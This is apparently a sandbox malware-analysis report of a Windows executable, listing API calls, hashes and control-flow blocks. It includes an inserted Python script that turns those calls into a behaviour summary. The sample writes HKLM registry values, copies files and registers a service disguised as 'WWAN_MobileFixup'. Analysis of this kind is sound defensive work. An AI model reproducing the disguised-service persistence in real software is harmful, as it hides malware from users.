                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CtrlDispatcherServiceStart
                                                                            • String ID:
                                                                            • API String ID: 3789849863-0
                                                                            • Opcode ID: 6dc742ed42f21e6c69dac81c81aca4cf90024d9fc7185b2147acdb0c855cd8ac
                                                                            • Instruction ID: 40a2f8b49cbd42c4c1ae9a929fb38234da1fb277cd8ec946056b9c6573f4ebba
                                                                            • Opcode Fuzzy Hash: 6dc742ed42f21e6c69dac81c81aca4cf90024d9fc7185b2147acdb0c855cd8ac
                                                                            • Instruction Fuzzy Hash: E1A011A020C20AEACA0002808A0C0B2A00CA30A32AB3008B3200FB00C282BC802238AF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetVersion.KERNEL32 ref: 00402F48
                                                                              • Part of subcall function 0040325A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                              • Part of subcall function 0040325A: HeapDestroy.KERNEL32 ref: 004032AA
                                                                            • GetCommandLineA.KERNEL32 ref: 00402F96
                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00402FC1
                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FE4
                                                                              • Part of subcall function 0040303D: ExitProcess.KERNEL32 ref: 0040305A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                            • String ID: 6i
                                                                            • API String ID: 2057626494-2055133051
                                                                            • Opcode ID: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
                                                                            • Instruction ID: 0a95150e04a59658555c79dd88d1413615d8933c927d5f415567a3b7127da264
                                                                            • Opcode Fuzzy Hash: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
                                                                            • Instruction Fuzzy Hash: 32218EB19407059BDB08AFA6DE49A6E7BB9EF44304F10413EFA05BB2E1DB384550CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 40417b-404213 (rendered graph image with Executed / Not Executed legend; the textual edge list is not reproduced)
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,?,00404166,?,00000000,00000000,00402FF9,00000000,00000000), ref: 0040418B
                                                                            • TerminateProcess.KERNEL32(00000000,?,00404166,?,00000000,00000000,00402FF9,00000000,00000000), ref: 00404192
                                                                            • ExitProcess.KERNEL32 ref: 0040420C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: c2260ba4ba3a7ce087c0bc5af1c4df8ffe5f30a9fab647541faefa4ff898e018
                                                                            • Instruction ID: 513b21a01c22477a45cfaa627a8dde47c11b7c557bbe69d9200b46c06abf8301
                                                                            • Opcode Fuzzy Hash: c2260ba4ba3a7ce087c0bc5af1c4df8ffe5f30a9fab647541faefa4ff898e018
                                                                            • Instruction Fuzzy Hash: 36012DB1644301DADA10AF64FD8CA0A77A4EBE0350B10457FF6417B2E0C739A8D1CB2E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCommandLineW.KERNEL32 ref: 0040223C
                                                                            • CommandLineToArgvW.SHELL32(00000000), ref: 0040B040
                                                                            • GetLocalTime.KERNEL32(00409FB8), ref: 0040B942
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CommandLine$ArgvLocalTime
                                                                            • String ID:
                                                                            • API String ID: 3768950922-0
                                                                            • Opcode ID: f727ac15d8a02c0163e01fb7637a754121b5fc1ed335fb52cb76b17d48f4068b
                                                                            • Instruction ID: fe59c91cec6a1bbfec2f2a739a0674a99631b7336b4ea49b5c82aa235aaf9e13
                                                                            • Opcode Fuzzy Hash: f727ac15d8a02c0163e01fb7637a754121b5fc1ed335fb52cb76b17d48f4068b
                                                                            • Instruction Fuzzy Hash: F4D01273448012EBC2007BE19A0E99D37E5A64A3523224077F243F11E1CB3C44959B6F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 40b33b-40ba7e (rendered graph image with Executed / Not Executed legend; the textual edge list is not reproduced)
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CopyFile
                                                                            • String ID: ?NI
                                                                            • API String ID: 1304948518-117959909
                                                                            • Opcode ID: 1ba00870fd27b3cdf3e8498eb1257aa92a605fb7dfbe0c732b82863bd5f53ab8
                                                                            • Instruction ID: c2822da89412b159851219babc5dd957992176794b394267062855fcf32f5c0e
                                                                            • Opcode Fuzzy Hash: 1ba00870fd27b3cdf3e8498eb1257aa92a605fb7dfbe0c732b82863bd5f53ab8
                                                                            • Instruction Fuzzy Hash: 77D02B3138921246CD0265242E0EAF67309C7A3349B241977ED07FF2C0D1B9861762CD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                             Control-flow Graph

                                                                             Basic blocks (graph image not extracted): 40325a-403278 [HeapCreate], 40327a-403287 [call 403112], 403289-403294 [call 4032b7], 403296-403299, 40329b [call 403b08], 4032a0-4032a2, 4032a4-4032aa [HeapDestroy], 4032b0-4032b2, 4032b3-4032b6
                                                                            APIs
                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                              • Part of subcall function 00403112: GetVersionExA.KERNEL32 ref: 00403131
                                                                            • HeapDestroy.KERNEL32 ref: 004032AA
                                                                              • Part of subcall function 004032B7: HeapAlloc.KERNEL32(00000000,00000140,00403293,000003F8), ref: 004032C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$AllocCreateDestroyVersion
                                                                            • String ID:
                                                                            • API String ID: 2507506473-0
                                                                            • Opcode ID: 401029335cdd060f4c3739ebb86f5453ce87962896cee6a98a7773047d595e2a
                                                                            • Instruction ID: bdc1dc1f8be9f1a85e4812a31df9c453441b6f572615afd11c7cbbe7009e603d
                                                                            • Opcode Fuzzy Hash: 401029335cdd060f4c3739ebb86f5453ce87962896cee6a98a7773047d595e2a
                                                                            • Instruction Fuzzy Hash: 08F0E5319043015AEF245F306E463263EA8DB50397F1184BFF401F82D1EB78C790950A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                             Control-flow Graph

                                                                             Basic blocks (graph image not extracted): 40b40c-40b4d9 [RegQueryValueExA], 40b822-40b82b [RegCloseKey], 40b92e, 40b934-40ba4e, 40ba54
                                                                            APIs
                                                                            • RegQueryValueExA.KERNELBASE ref: 0040B4D1
                                                                            • RegCloseKey.KERNELBASE(?), ref: 0040B825
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3356406503-0
                                                                            • Opcode ID: 134ce427d92d70c0111e1806a8c5cfdfd9407f9f49210c1a287f1998412d3728
                                                                            • Instruction ID: a3e4645529f843f61550e48a598415364148f40a2ce15bb9cbadf78dc0097e25
                                                                            • Opcode Fuzzy Hash: 134ce427d92d70c0111e1806a8c5cfdfd9407f9f49210c1a287f1998412d3728
                                                                            • Instruction Fuzzy Hash: A4D0C931948106EAC7009FB08F0D5397EA9FA083417218577A603B00E0D7BD46126A9E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                             Control-flow Graph

                                                                             Basic blocks (graph image not extracted): 40b4d3-40b4e6 [CreateDirectoryA], 40b4fc-40b50e, 40b510-40b528, 40b52a-40b535, 40b58b, 40b59d-40b5b5, 40b5b7-40b5b9
                                                                            APIs
                                                                            • CreateDirectoryA.KERNELBASE ref: 0040B4E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory
                                                                            • String ID:
                                                                            • API String ID: 4241100979-0
                                                                            • Opcode ID: fcd0fb28436346cebec9de2a814f493663ffb4acfc5454b8ba783580e8604382
                                                                            • Instruction ID: ebd2c6e02f9d43b3d40f01d17a74bd438e6d2ac48b0db6d6420a9778e4eaa713
                                                                            • Opcode Fuzzy Hash: fcd0fb28436346cebec9de2a814f493663ffb4acfc5454b8ba783580e8604382
                                                                            • Instruction Fuzzy Hash: 4BF0A26345C29CAFC321D5B83C448E23F74F5931507554EA7D151AF087D2198953C3CD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                             Control-flow Graph

                                                                             Basic blocks (graph image not extracted): 4028fd-40b3c8 [RegOpenKeyExA], 40b934-40b936, 40ba4e, 40ba54
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNELBASE(80000002), ref: 0040B3C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 8340735e36433d2e621e99962aac8dbece34f8ed7b0fbf864752116af6356328
                                                                            • Instruction ID: 909e799b75931c5b62772d4b2f3710706e3fc10ef07775b3481c305365d9140b
                                                                            • Opcode Fuzzy Hash: 8340735e36433d2e621e99962aac8dbece34f8ed7b0fbf864752116af6356328
                                                                            • Instruction Fuzzy Hash: 72C04C60608146EAE6089AB189096762768EB44740F3149378913F16D0D339DA1665AF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                             Control-flow Graph

                                                                             Basic blocks (graph image not extracted): 40b3ea-40ba04 [RegSetValueExA]
                                                                            APIs
                                                                            • RegSetValueExA.KERNELBASE(?), ref: 0040B9FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Value
                                                                            • String ID:
                                                                            • API String ID: 3702945584-0
                                                                            • Opcode ID: 5317ccae25348d6653a0bc53609ee191fbdf3e00c6017a1cf178d5707409b4b6
                                                                            • Instruction ID: 4d13c9e98189893827979a362c4bd14f52071052fe37cb831e46076aa9f9f1e9
                                                                            • Opcode Fuzzy Hash: 5317ccae25348d6653a0bc53609ee191fbdf3e00c6017a1cf178d5707409b4b6
                                                                            • Instruction Fuzzy Hash: 9FC08CB1804409FACB061BD09C08A3C7E3AE708788F200462E10330CA0C33E0BB2BB6E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                             Control-flow Graph

                                                                             Basic blocks (graph image not extracted): 40b397-40ba76 [CopyFileA], 402760-402761, 40ba7c, 40ba7e
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CopyFile
                                                                            • String ID:
                                                                            • API String ID: 1304948518-0
                                                                            • Opcode ID: 7d38dac9929fb4991dc41ff22106602b2e1087a9a39ff8f9de006141421cb0d1
                                                                            • Instruction ID: 4b668b5fb2a19e430f9510732bbbf35e32ddcc61e88bebebdf2395f5775374df
                                                                            • Opcode Fuzzy Hash: 7d38dac9929fb4991dc41ff22106602b2e1087a9a39ff8f9de006141421cb0d1
                                                                            • Instruction Fuzzy Hash: AAB012B4384214A6E5006A300F8DF37121DDB007C1F1400333507F60E0C6FCC981657E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                             Control-flow Graph

                                                                             Basic blocks (graph image not extracted): 40b4de-40b4e6 [CreateDirectoryA]
                                                                            APIs
                                                                            • CreateDirectoryA.KERNELBASE ref: 0040B4E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory
                                                                            • String ID:
                                                                            • API String ID: 4241100979-0
                                                                            • Opcode ID: c151bc14e0bb91fbb8e7eca4dafd0b7c5a4a5b715ebfa07865c3b19ad9e5cb26
                                                                            • Instruction ID: d70fb2d4326590eea8b65127b1b419e7c4e084d95afc867c60e11a96707e2c92
                                                                            • Opcode Fuzzy Hash: c151bc14e0bb91fbb8e7eca4dafd0b7c5a4a5b715ebfa07865c3b19ad9e5cb26
                                                                            • Instruction Fuzzy Hash: 64A0223008A020EAE00023000EA8C2B3C3CF8003C23208033B303B00C0833E080302BF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                             Control-flow Graph

                                                                             Basic blocks (graph image not extracted): 40286b, 4028db-4028e1 [RegCloseKey]
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 990c3c1dea4594085966e104cf6a03199e71a4503b704534c7eb79dcaa3d89bf
                                                                            • Instruction ID: 76804de5ad9cf923849592551e73c5d136ae12485515376d4ea460b458854c4b
                                                                            • Opcode Fuzzy Hash: 990c3c1dea4594085966e104cf6a03199e71a4503b704534c7eb79dcaa3d89bf
                                                                            • Instruction Fuzzy Hash: 5DA01230C04409C7C20497A0C30C4283AB459043043114072C113B00D0C37C5502550A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RegCreateKeyExA.KERNELBASE ref: 004028A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: c119085e98968012a478d05f9da36ab8ada70fc996d553aa7d263a9e4816e65c
                                                                            • Instruction ID: 94413375a01e53b797accf35fc7fe945d277f428ce3223a44cf6c20e190ec76b
                                                                            • Opcode Fuzzy Hash: c119085e98968012a478d05f9da36ab8ada70fc996d553aa7d263a9e4816e65c
                                                                            • Instruction Fuzzy Hash: 31900230344101EAE2104B315B0C21A2598550464571104355B0BE4190D6748511551D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: ManagerOpen
                                                                            • String ID:
                                                                            • API String ID: 1889721586-0
                                                                            • Opcode ID: dfaf3f851df420e3e7b0c4056ca2fcc5e50da974e7909aa90e6769422c755a01
                                                                            • Instruction ID: 893d3e26ed5c51661bf8be8d29d2bb54a563af28b692fefe241a45f5ad98b385
                                                                            • Opcode Fuzzy Hash: dfaf3f851df420e3e7b0c4056ca2fcc5e50da974e7909aa90e6769422c755a01
                                                                            • Instruction Fuzzy Hash: D29002201540019FC2504F105FAD01825D251403063710435E203F40E0D6744455A92E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 1586166983-0
                                                                            • Opcode ID: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                            • Instruction ID: b9dd472658aa79e8713cc1c43643f3a09ee23d5b7ec078f99577b19effab2280
                                                                            • Opcode Fuzzy Hash: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                            • Instruction Fuzzy Hash: 54F09A3260C2538EC74216656A082B67BA0AA51710B38847B9C87B51D2DBBC485376AF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: CreateService
                                                                            • String ID:
                                                                            • API String ID: 1592570254-0
                                                                            • Opcode ID: 20bb668e72a770e7973f593bb331a6a58a03ea000dbdcb0468e7c3fb687a14c6
                                                                            • Instruction ID: e828ca7ff849c5aa2293def9fffda87c5c0e13961c3d7613c3eafe11c79639c0
                                                                            • Opcode Fuzzy Hash: 20bb668e72a770e7973f593bb331a6a58a03ea000dbdcb0468e7c3fb687a14c6
                                                                            • Instruction Fuzzy Hash: C7C04C30888105EBCB644F40AD58D2B3A79D680315B714876E507B69D0D33D6D56BAFF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

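The function listings on this page give the raw material for a behaviour summary: HKEY_LOCAL_MACHINE registry access (RegOpenKeyExA with hive handle 80000002, RegCreateKeyExA, RegSetValueExA), file drops (CreateDirectoryA, CopyFileA), the Service Control Manager routines (API IDs ManagerOpen and CreateService above) and the service control handler listed next, which registers the service name "WWAN_MobileFixup 2.33.197.66". The script below is an added example, not Joe Sandbox code and not code from the analysed sample: it parses lines in the report's "APIs" format and derives that summary plus hunting artefacts (service name, registry hive). The line grammar is inferred from the lines visible on this page and the API-to-behaviour table is the author's own assumption, not a vendor signature; the sample input is constructed by copying API lines from this page.

```python
"""Behaviour summary from the per-function "APIs" lines of a Joe Sandbox
disassembly listing (lines that read "• Api.MODULE(args), ref: address").

Added example for this page; it is not Joe Sandbox code and not code from the
analysed sample. Assumptions: the line format is inferred from the lines
visible on the page, and CATEGORY below is the author's own mapping.
"""
import re
from collections import defaultdict

# Constructed sample: API lines copied from the function listings on this page.
SAMPLE_LINES = """
• RegOpenKeyExA.KERNELBASE(80000002), ref: 0040B3C0
• RegQueryValueExA.KERNELBASE ref: 0040B4D1
• RegCloseKey.KERNELBASE(?), ref: 0040B825
• CreateDirectoryA.KERNELBASE ref: 0040B4E0
• RegSetValueExA.KERNELBASE(?), ref: 0040B9FE
• RegCreateKeyExA.KERNELBASE ref: 004028A6
• HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
  • Part of subcall function 00403112: GetVersionExA.KERNEL32 ref: 00403131
• RegisterServiceCtrlHandlerA.ADVAPI32(WWAN_MobileFixup 2.33.197.66,Function_0000235E), ref: 004023C1
• SetServiceStatus.ADVAPI32(0040A110), ref: 00402420
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
• CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
"""

# Grammar inferred from the page: optional "Part of subcall function X:" prefix,
# then Api.MODULE, optional "(args)", optional comma, then "ref: <hex address>".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Predefined registry hive handles (documented Windows constants).
HIVES = {"80000000": "HKEY_CLASSES_ROOT", "80000001": "HKEY_CURRENT_USER",
         "80000002": "HKEY_LOCAL_MACHINE", "80000003": "HKEY_USERS"}

# Author's mapping of APIs to coarse behaviours (assumption, not a vendor table).
CATEGORY = {
    "RegOpenKeyExA": "registry_read", "RegQueryValueExA": "registry_read",
    "RegCloseKey": "registry_read",
    "RegCreateKeyExA": "registry_write", "RegSetValueExA": "registry_write",
    "CreateDirectoryA": "file_drop", "CopyFileA": "file_drop",
    "OpenSCManagerA": "service_install", "OpenSCManagerW": "service_install",
    "CreateServiceA": "service_install", "CreateServiceW": "service_install",
    "RegisterServiceCtrlHandlerA": "service_main", "SetServiceStatus": "service_main",
}


def parse_api_line(line):
    """Return a dict for one API line, or None for headers and other text."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": args.split(",") if args is not None else [],
        "ref": int(m.group("ref"), 16),
        # Set when the report attributes the call to a callee of the function.
        "caller": int(m.group("caller"), 16) if m.group("caller") else None,
    }


def summarize(text):
    """Group parsed calls by behaviour and pull out hunting artefacts."""
    calls = [c for c in map(parse_api_line, text.splitlines()) if c]
    cats = defaultdict(set)
    for c in calls:
        cats[CATEGORY.get(c["api"], "other")].add(c["api"])

    # The service name is the first argument to RegisterServiceCtrlHandler*.
    service_name = next(
        (c["args"][0] for c in calls
         if c["api"].startswith("RegisterServiceCtrlHandler") and c["args"]), None)
    # The hive handle is the first argument to RegOpenKeyEx*/RegCreateKeyEx*.
    hives = sorted({HIVES[c["args"][0]] for c in calls
                    if c["api"].startswith(("RegOpenKeyEx", "RegCreateKeyEx"))
                    and c["args"] and c["args"][0] in HIVES})

    behaviours = []
    if service_name:
        behaviours.append(f"runs as a Windows service named {service_name!r}")
    if cats.get("registry_write"):
        where = ", ".join(hives) if hives else "unknown hive"
        behaviours.append(f"writes registry keys/values ({where})")
    if cats.get("file_drop"):
        behaviours.append("creates directories and/or copies files")
    if cats.get("service_install"):
        behaviours.append("installs a service via the Service Control Manager")
    return {
        "calls": len(calls),
        "categories": {k: sorted(v) for k, v in cats.items()},
        "service_name": service_name,
        "registry_hives": hives,
        "behaviours": behaviours,
    }


if __name__ == "__main__":
    for b in summarize(SAMPLE_LINES)["behaviours"]:
        print("-", b)
```

On the sample above the summary reports a service named "WWAN_MobileFixup 2.33.197.66", registry writes under HKEY_LOCAL_MACHINE (which requires administrative rights, consistent with the report's "launch a program with higher privileges" signature) and directory/file creation; those three facts are what an analyst would turn into host-based hunting queries.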
                                                                            APIs
                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(WWAN_MobileFixup 2.33.197.66,Function_0000235E), ref: 004023C1
                                                                            • SetServiceStatus.ADVAPI32(0040A110), ref: 00402420
                                                                            • GetLastError.KERNEL32 ref: 00402422
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                            • GetLastError.KERNEL32 ref: 00402450
                                                                            • SetServiceStatus.ADVAPI32(0040A110), ref: 00402480
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                            • CloseHandle.KERNEL32 ref: 004024A1
                                                                            • SetServiceStatus.ADVAPI32(0040A110), ref: 004024CA
                                                                            Strings
                                                                            • WWAN_MobileFixup 2.33.197.66, xrefs: 004023BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                            • String ID: WWAN_MobileFixup 2.33.197.66
                                                                            • API String ID: 3346042915-2719033208
                                                                            • Opcode ID: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
                                                                            • Instruction ID: 16ab96e2cb68f3bca67a8d02827ccf702012fa4ba7b91bfe8048b6e668af4302
                                                                            • Opcode Fuzzy Hash: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
                                                                            • Instruction Fuzzy Hash: A621ECB0841310ABC2109F16EF4D9167EB8EBCA758F11413AE105BA2B2C7B94575CFAE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D1D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406530,?,00406580,?,?,?,Runtime Error!Program: ), ref: 00405869
                                                                            • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405881
                                                                            • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405892
                                                                            • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040589F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1982657794.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.1982657794.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
